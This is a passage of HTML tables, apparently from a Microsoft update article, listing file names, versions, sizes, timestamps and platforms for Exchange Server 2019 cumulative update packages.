applicable</td></tr><tr><td>Microsoft.forefront.management.powershell.types.ps1xml</td><td>Not applicable</td><td>16,274</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Microsoft.forefront.monitoring.activemonitoring.local.components.dll</td><td>15.2.529.8</td><td>1,518,456</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.forefront.monitoring.activemonitoring.local.components.messages.dll</td><td>15.2.529.8</td><td>13,176</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.forefront.monitoring.management.outsidein.dll</td><td>15.2.529.8</td><td>33,360</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.forefront.recoveryactionarbiter.contract.dll</td><td>15.2.529.8</td><td>18,296</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.forefront.reporting.common.dll</td><td>15.2.529.8</td><td>46,456</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.forefront.reporting.ondemandquery.dll</td><td>15.2.529.8</td><td>50,560</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.isam.esent.collections.dll</td><td>15.2.529.8</td><td>72,568</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.isam.esent.interop.dll</td><td>15.2.529.8</td><td>541,560</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.managementgui.dll</td><td>15.2.529.8</td><td>133,712</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.mce.interop.dll</td><td>15.2.529.8</td><td>24,440</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.office.audit.dll</td><td>15.2.529.8</td><td>125,008</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.office.client.discovery.unifiedexport.dll</td><td>15.2.529.8</td><td>593,280</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.office.common.ipcommonlogger.dll</td><td>15.2.529.8</td><td>42,368</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.core.dll</td><td>15.2.529.8</td><td>217,976</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.dll</td><td>15.2.529.8</td><td>854,904</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.extensions.dll</td><td>15.2.529.8</td><td>485,968</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.core.dll</td><td>15.2.529.8</td><td>413,056</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.ingestion.dll</td><td>15.2.529.8</td><td>36,224</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.office.compliancepolicy.exchange.dar.dll</td><td>15.2.529.8</td><td>84,856</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.office.compliancepolicy.platform.dll</td><td>15.2.529.8</td><td>1,782,136</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoring.management.common.dll</td><td>15.2.529.8</td><td>49,536</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoring.management.dll</td><td>15.2.529.8</td><td>27,720</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoringlocal.dll</td><td>15.2.529.8</td><td>174,968</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.monitoring.activemonitoring.recovery.dll</td><td>15.2.529.8</td><td>166,472</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.office365.datainsights.uploader.dll</td><td>15.2.529.8</td><td>40,528</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.online.box.shell.dll</td><td>15.2.529.8</td><td>46,456</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools.dll</td><td>15.2.529.8</td><td>68,176</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools_2.dll</td><td>15.2.529.8</td><td>68,176</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.tailoredexperiences.core.dll</td><td>15.2.529.8</td><td>120,184</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Migrateumcustomprompts.ps1</td><td>Not applicable</td><td>19,106</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Modernpublicfoldertomailboxmapgenerator.ps1</td><td>Not applicable</td><td>29,348</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Movemailbox.ps1</td><td>Not applicable</td><td>61,116</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Movetransportdatabase.ps1</td><td>Not applicable</td><td>30,586</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Move_publicfolderbranch.ps1</td><td>Not applicable</td><td>17,520</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Mpgearparser.dll</td><td>15.2.529.8</td><td>99,912</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Msclassificationadapter.dll</td><td>15.2.529.8</td><td>248,912</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Msexchangecompliance.exe</td><td>15.2.529.8</td><td>78,712</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Msexchangedagmgmt.exe</td><td>15.2.529.8</td><td>25,672</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Msexchangedelivery.exe</td><td>15.2.529.8</td><td>38,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Msexchangefrontendtransport.exe</td><td>15.2.529.8</td><td>31,824</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Msexchangehmhost.exe</td><td>15.2.529.8</td><td>27,208</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Msexchangehmrecovery.exe</td><td>15.2.529.8</td><td>29,792</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Msexchangemailboxassistants.exe</td><td>15.2.529.8</td><td>72,568</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Msexchangemailboxreplication.exe</td><td>15.2.529.8</td><td>21,064</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Msexchangemigrationworkflow.exe</td><td>15.2.529.8</td><td>68,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Msexchangerepl.exe</td><td>15.2.529.8</td><td>71,272</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Msexchangesubmission.exe</td><td>15.2.529.8</td><td>123,256</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Msexchangethrottling.exe</td><td>15.2.529.8</td><td>39,808</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Msexchangetransport.exe</td><td>15.2.529.8</td><td>74,104</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Msexchangetransportlogsearch.exe</td><td>15.2.529.8</td><td>139,344</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Msexchangewatchdog.exe</td><td>15.2.529.8</td><td>55,672</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Mspatchlinterop.dll</td><td>15.2.529.8</td><td>53,624</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Nativehttpproxy.dll</td><td>15.2.529.8</td><td>91,520</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Navigatorparser.dll</td><td>15.2.529.8</td><td>636,792</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Nego2nativeinterface.dll</td><td>15.2.529.8</td><td>19,320</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Negotiateclientcertificatemodule.dll</td><td>15.2.529.8</td><td>30,080</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Newtestcasconnectivityuser.ps1</td><td>Not applicable</td><td>19,748</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Newtestcasconnectivityuserhosting.ps1</td><td>Not applicable</td><td>24,567</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Ntspxgen.dll</td><td>15.2.529.8</td><td>80,768</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Oleconverter.exe</td><td>15.2.529.8</td><td>173,944</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Outsideinmodule.dll</td><td>15.2.529.8</td><td>87,936</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Owaauth.dll</td><td>15.2.529.8</td><td>92,024</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Perf_common_extrace.dll</td><td>15.2.529.8</td><td>245,112</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Perf_exchmem.dll</td><td>15.2.529.8</td><td>86,608</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Pipeline2.dll</td><td>15.2.529.8</td><td>1,454,456</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Preparemoverequesthosting.ps1</td><td>Not applicable</td><td>70,983</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Prepare_moverequest.ps1</td><td>Not applicable</td><td>73,213</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Productinfo.managed.dll</td><td>15.2.529.8</td><td>27,008</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Proxybinclientsstringsdll</td><td>15.2.529.8</td><td>924,544</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Publicfoldertomailboxmapgenerator.ps1</td><td>Not applicable</td><td>23,226</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Quietexe.exe</td><td>15.2.529.8</td><td>14,928</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Redistributeactivedatabases.ps1</td><td>Not applicable</td><td>250,532</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Reinstalldefaulttransportagents.ps1</td><td>Not applicable</td><td>21,643</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Remoteexchange.ps1</td><td>Not applicable</td><td>23,857</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Removeuserfrompfrecursive.ps1</td><td>Not applicable</td><td>14,664</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Replaceuserpermissiononpfrecursive.ps1</td><td>Not applicable</td><td>14,986</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Replaceuserwithuseronpfrecursive.ps1</td><td>Not applicable</td><td>14,996</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Replaycrimsonmsg.dll</td><td>15.2.529.8</td><td>1,104,976</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Resetattachmentfilterentry.ps1</td><td>Not applicable</td><td>15,464</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Resetcasservice.ps1</td><td>Not applicable</td><td>21,691</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Reset_antispamupdates.ps1</td><td>Not applicable</td><td>14,085</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Restoreserveronprereqfailure.ps1</td><td>Not applicable</td><td>15,125</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Resumemailboxdatabasecopy.ps1</td><td>Not applicable</td><td>17,194</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Rightsmanagementwrapper.dll</td><td>15.2.529.8</td><td>86,392</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Rollalternateserviceaccountpassword.ps1</td><td>Not applicable</td><td>56,074</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Rpcperf.dll</td><td>15.2.529.8</td><td>23,416</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Rpcproxyshim.dll</td><td>15.2.529.8</td><td>39,288</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Rulesauditmsg.dll</td><td>15.2.529.8</td><td>12,672</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Safehtmlnativewrapper.dll</td><td>15.2.529.8</td><td>34,920</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Scanenginetest.exe</td><td>15.2.529.8</td><td>956,288</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Scanningprocess.exe</td><td>15.2.529.8</td><td>739,192</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Searchdiagnosticinfo.ps1</td><td>Not applicable</td><td>16,796</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Servicecontrol.ps1</td><td>Not applicable</td><td>52,313</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Setmailpublicfolderexternaladdress.ps1</td><td>Not applicable</td><td>21,074</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Settingsadapter.dll</td><td>15.2.529.8</td><td>116,088</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Setup.exe</td><td>15.2.529.8</td><td>20,344</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Setupui.exe</td><td>15.2.529.8</td><td>188,280</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Split_publicfoldermailbox.ps1</td><td>Not applicable</td><td>52,173</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Startdagservermaintenance.ps1</td><td>Not applicable</td><td>27,835</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Statisticsutil.dll</td><td>15.2.529.8</td><td>142,200</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Stopdagservermaintenance.ps1</td><td>Not applicable</td><td>21,117</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Storetsconstants.ps1</td><td>Not applicable</td><td>16,110</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Storetslibrary.ps1</td><td>Not applicable</td><td>27,991</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Store_mapi_net_bin_perf_x64_exrpcperf.dll</td><td>15.2.529.8</td><td>28,536</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Sync_mailpublicfolders.ps1</td><td>Not applicable</td><td>43,911</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Sync_modernmailpublicfolders.ps1</td><td>Not applicable</td><td>43,961</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Textconversionmodule.dll</td><td>15.2.529.8</td><td>86,392</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Troubleshoot_ci.ps1</td><td>Not applicable</td><td>22,715</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Troubleshoot_databaselatency.ps1</td><td>Not applicable</td><td>33,421</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Troubleshoot_databasespace.ps1</td><td>Not applicable</td><td>30,321</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Uninstall_antispamagents.ps1</td><td>Not applicable</td><td>15,461</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Updateapppoolmanagedframeworkversion.ps1</td><td>Not applicable</td><td>14,014</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Updatecas.ps1</td><td>Not applicable</td><td>35,786</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Updateconfigfiles.ps1</td><td>Not applicable</td><td>19,726</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Updateserver.exe</td><td>15.2.529.8</td><td>3,014,736</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Update_malwarefilteringserver.ps1</td><td>Not applicable</td><td>18,144</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Web.config_053c31bdd6824e95b35d61b0a5e7b62d</td><td>Not applicable</td><td>31,813</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Wsbexchange.exe</td><td>15.2.529.8</td><td>125,304</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>X400prox.dll</td><td>15.2.529.8</td><td>103,288</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>_search.lingoperators.a</td><td>15.2.529.8</td><td>34,680</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>_search.lingoperators.b</td><td>15.2.529.8</td><td>34,680</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>_search.mailboxoperators.a</td><td>15.2.529.8</td><td>290,168</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>_search.mailboxoperators.b</td><td>15.2.529.8</td><td>290,168</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>_search.operatorschema.a</td><td>15.2.529.8</td><td>485,960</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>_search.operatorschema.b</td><td>15.2.529.8</td><td>485,960</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>_search.tokenoperators.a</td><td>15.2.529.8</td><td>113,536</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>_search.tokenoperators.b</td><td>15.2.529.8</td><td>113,536</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>_search.transportoperators.a</td><td>15.2.529.8</td><td>68,192</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>_search.transportoperators.b</td><td>15.2.529.8</td><td>68,192</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr></tbody></table></div></div></div></div><div contenteditable=\"false\" tabindex=\"-1\"><div class=\"faq-section\" data-widget=\"collapsible\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Exchange Server 2019 Cumulative Update 3</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th><th>Platform</th></tr><tr><td>Activemonitoringeventmsg.dll</td><td>15.2.464.10</td><td>71,248</td><td>01-Jan-2020</td><td>10:48</td><td>x64</td></tr><tr><td>Activemonitoringexecutionlibrary.ps1</td><td>Not applicable</td><td>29,802</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Adduserstopfrecursive.ps1</td><td>Not applicable</td><td>14,925</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Ademodule.dll</td><td>15.2.464.10</td><td>106,360</td><td>01-Jan-2020</td><td>10:48</td><td>x64</td></tr><tr><td>Airfilter.dll</td><td>15.2.464.10</td><td>42,872</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Ajaxcontroltoolkit.dll</td><td>15.2.464.10</td><td>92,536</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Antispamcommon.ps1</td><td>Not applicable</td><td>13,489</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Asdat.msi</td><td>Not applicable</td><td>5,087,232</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Asentirs.msi</td><td>Not applicable</td><td>77,824</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Asentsig.msi</td><td>Not applicable</td><td>73,728</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Bigfunnel.bondtypes.dll</td><td>15.2.464.10</td><td>45,432</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Bigfunnel.common.dll</td><td>15.2.464.10</td><td>66,640</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Bigfunnel.configuration.dll</td><td>15.2.464.10</td><td>118,144</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Bigfunnel.entropy.dll</td><td>15.2.464.10</td><td>44,624</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Bigfunnel.filter.dll</td><td>15.2.464.10</td><td>54,144</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Bigfunnel.indexstream.dll</td><td>15.2.464.10</td><td>68,984</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Bigfunnel.neuraltree.dll</td><td>Not applicable</td><td>694,144</td><td>01-Jan-2020</td><td>10:48</td><td>x64</td></tr><tr><td>Bigfunnel.neuraltreeranking.dll</td><td>15.2.464.10</td><td>20,048</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Bigfunnel.poi.dll</td><td>15.2.464.10</td><td>245,112</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Bigfunnel.postinglist.dll</td><td>15.2.464.10</td><td>189,312</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Bigfunnel.query.dll</td><td>15.2.464.10</td><td>101,248</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Bigfunnel.ranking.dll</td><td>15.2.464.10</td><td>109,640</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Bigfunnel.syntheticdatalib.dll</td><td>15.2.464.10</td><td>3,634,552</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Bigfunnel.tracing.dll</td><td>15.2.464.10</td><td>42,880</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Bigfunnel.wordbreakers.dll</td><td>15.2.464.10</td><td>46,672</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Cafe_airfilter_dll</td><td>15.2.464.10</td><td>42,872</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Cafe_exppw_dll</td><td>15.2.464.10</td><td>83,536</td><td>01-Jan-2020</td><td>10:48</td><td>x64</td></tr><tr><td>Cafe_owaauth_dll</td><td>15.2.464.10</td><td>92,024</td><td>01-Jan-2020</td><td>10:47</td><td>x64</td></tr><tr><td>Calcalculation.ps1</td><td>Not applicable</td><td>42,393</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Checkdatabaseredundancy.ps1</td><td>Not applicable</td><td>94,902</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Chksgfiles.dll</td><td>15.2.464.10</td><td>57,216</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Citsconstants.ps1</td><td>Not applicable</td><td>15,801</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Citslibrary.ps1</td><td>Not applicable</td><td>82,660</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Citstypes.ps1</td><td>Not applicable</td><td>14,760</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Classificationengine_mce</td><td>15.2.464.10</td><td>1,693,776</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Clusmsg.dll</td><td>15.2.464.10</td><td>134,016</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Coconet.dll</td><td>15.2.464.10</td><td>47,992</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Collectovermetrics.ps1</td><td>Not applicable</td><td>81,940</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Collectreplicationmetrics.ps1</td><td>Not applicable</td><td>42,162</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Commonconnectfunctions.ps1</td><td>Not applicable</td><td>29,931</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Complianceauditservice.exe</td><td>15.2.464.11</td><td>39,800</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Configureadam.ps1</td><td>Not applicable</td><td>23,060</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Configurecaferesponseheaders.ps1</td><td>Not applicable</td><td>20,604</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Configurecryptodefaults.ps1</td><td>Not applicable</td><td>42,035</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Configurenetworkprotocolparameters.ps1</td><td>Not applicable</td><td>20,106</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Configuresmbipsec.ps1</td><td>Not applicable</td><td>39,824</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Configure_enterprisepartnerapplication.ps1</td><td>Not applicable</td><td>22,279</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Connectfunctions.ps1</td><td>Not applicable</td><td>37,417</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Connect_exchangeserver_help.xml</td><td>Not applicable</td><td>29,596</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Consoleinitialize.ps1</td><td>Not applicable</td><td>24,524</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Convertoabvdir.ps1</td><td>Not applicable</td><td>20,349</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Converttomessagelatency.ps1</td><td>Not applicable</td><td>14,528</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Convert_distributiongrouptounifiedgroup.ps1</td><td>Not applicable</td><td>35,057</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Create_publicfoldermailboxesformigration.ps1</td><td>Not applicable</td><td>28,204</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Cts.14.0.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Cts.14.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Cts.14.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Cts.14.3.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Cts.14.4.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Cts.15.0.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Cts.15.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Cts.15.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Cts.15.20.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Cts.8.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Cts.8.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>504</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Cts.8.3.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not 